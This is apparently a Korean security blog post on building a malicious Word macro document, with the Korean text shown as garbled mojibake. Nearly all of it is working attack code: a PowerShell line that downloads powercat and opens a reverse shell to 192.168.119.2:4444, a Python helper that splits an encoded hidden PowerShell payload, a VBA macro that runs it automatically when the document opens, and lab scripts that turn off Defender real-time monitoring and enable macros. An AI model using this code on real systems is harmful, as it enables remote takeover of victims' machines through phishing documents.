๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
๐Ÿ”’์ •๋ณด๋ณด์•ˆ/์•…์„ฑ์ฝ”๋“œ & ์ทจ์•ฝ์  ๋ถ„์„

์•…์„ฑ์ฝ”๋“œ ๋ถ„์„ - ๋งคํฌ๋กœ ๋ฌธ์„œ ์•…์„ฑ ํŒŒ์ผ

by Janger 2025. 7. 26.
728x90

 

 

 

 

 

 

 

 

 

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

 

 

str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."

n = 50

for i in range(0, len(str), n):
	print("Str = Str + " + '"' + str[i:i+n] + '"')

์ฒญํฌํ™”(๋ฌธ์ž์—ด์ด ๋„ˆ๋ฌด ๊ธธ๋ฉด ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒ)

 

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
        Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
        Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    ...
        Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
        Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
        Str = Str + "A== "

    CreateObject("Wscript.Shell").Run Str
End Sub

 

 

applications_install.ps1
function Get-IP {
    try {
        return (Get-NetIPAddress | Where-Object { $_.IPAddress -like "192.168*"}).IPAddress
    } catch {
        Start-Sleep -Seconds 22
        return (Get-NetIPAddress | Where-Object { $_.IPAddress -like "192.168*"}).IPAddress
    }
}

$old_ip = '192.168.50.198'
$third = 50
$octets = ""

while ($third -eq 50) {

    $curr_ip = Get-IP
    $octets = $curr_ip.Split('.')
    $third = $octets[2]
    if ($third -eq 50) {
        Start-Sleep -Seconds 15
    }
}


$local_ip = Get-IP
if ($local_ip -ne $old_ip){


    try { (new-object -comobject word.application).version}
    catch {
        Mount-DiskImage -ImagePath C:\tools\Office2019.img
        E:\Office\Setup32.exe
        Start-Sleep -Seconds 120000
    }
}

 

 

applications_exec.ps1
# Loop for doc file and execute MyMacro
If (Test-Path C:\Users\Administrator\Documents\webapp\ticket.doc)
{
    $setup = Get-Process Setup32 -ErrorAction SilentlyContinue
    if ($setup) {
        exit
    }

    try { Start-Process WINWORD } catch { exit}
    Set-MpPreference -DisableRealtimeMonitoring $true
    
    Start-Sleep -Seconds 10
    Stop-Process -Name "WINWORD" -Force
    New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force
    Move-Item -Path C:\Users\Administrator\Documents\webapp\ticket.doc -Destination C:\Users\Administrator\Documents\ticket.doc
    Unblock-File -Path C:\Users\Administrator\Documents\ticket.doc
    Start-Process -FilePath "C:\Users\Administrator\Documents\ticket.doc" 
    Start-Sleep -Seconds 20
    Remove-Item C:\Users\Administrator\Documents\ticket.doc
}

 

728x90

'๐Ÿ”’์ •๋ณด๋ณด์•ˆ > ์•…์„ฑ์ฝ”๋“œ & ์ทจ์•ฝ์  ๋ถ„์„' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

์ทจ์•ฝ์  ๋ถ„์„ - CVE-2023-23397  (1) 2025.07.27
์ทจ์•ฝ์  ๋ถ„์„ - NTLM ํฌ๋ฆฌ๋ด์…œ ํŒจํ‚ท ์Šค๋‹ˆํผ (responder.py)  (1) 2025.07.27
์•…์„ฑ์ฝ”๋“œ ๋ถ„์„ - BPFDoor.c ์ฃผ์š” ์ฝ”๋“œ ๋ถ„์„ ๋ฐ BPFDoor ์ง„๋‹จ ์Šคํฌ๋ฆฝํŠธ ์ œ์ž‘  (0) 2025.05.13
์ทจ์•ฝ์  ๋ถ„์„ - Blind SSRF with out-of-band detection(Burp Collaborator)  (0) 2025.01.10
์ทจ์•ฝ์  ๋ถ„์„ - SSL(TLS) ์ธ์ฆ์„œ ๋ถ„์„ ๋„๊ตฌ(ssllabs, sslyze, sslscan)  (0) 2024.11.26

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”